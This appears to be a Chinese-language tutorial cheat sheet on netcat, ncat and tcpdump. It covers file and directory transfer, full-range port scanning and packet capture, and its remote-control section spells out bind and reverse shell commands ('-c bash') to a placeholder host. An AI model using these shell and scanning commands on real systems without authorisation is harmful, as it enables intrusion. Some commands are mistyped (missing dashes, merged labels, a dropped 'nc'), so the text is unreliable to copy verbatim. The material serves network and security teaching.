NETCAT ——NC

网络工具中的瑞⼠军刀——⼩身材、大智慧
侦听模式 / 传输模式
telnet / 获取banner信息
传输文本信息
传输文件/目标目录
加密传输文件
远程控制/木马
加密所有流量
流媒体服务器
远程克隆硬盘

NC——TELNET / BANNER

  1. nc nv 1.1.1.1 25 <br /> nc nv 1.1.1.1 80

NC——传输文本信息

  1. Anc -l -p 4444 <br /> Bnc nv 1.1.1.1 4444

NC——传输文件/目录

传输文件
A:nc -lp 333 > 1.mp4
B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1
传输目录
A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –
加密传文件
A:nc -lp 333 | mcrypt —flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt —flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q

NC——流媒体服务

A: cat 1.mp4 | nc -lp 333
B: 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

NC——端口扫描

nc -nvz 1.1.1.1 1-65535
nc –vnzu 1.1.1.1 1-1024

NC——远程控制

正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向:
A:nc -lp 333
B:nc 1.1.1.1 333 -c bash

NC——NCAT

Nc缺乏加密和身份验证的能⼒力
Ncat包含于nmap工具包中
A: ncat -c bash —allow 192.168.20.14 -vnl 333 —ssl
B:ncat -nv 1.1.1.1 333 —ssl

  • TCPDUMP——抓包

tcpdump -i eth0 -s 0 -w file.pcap
读取抓包文件
tcpdump -r file.pcap

  • TCPDUMP——筛选

tcpdump -n -r http.cap | awk ‘{print $3}’| sort –u
tcpdump -n src host 145.254.160.237 -r http.cap
tcpdump -n port 53 -r http.cap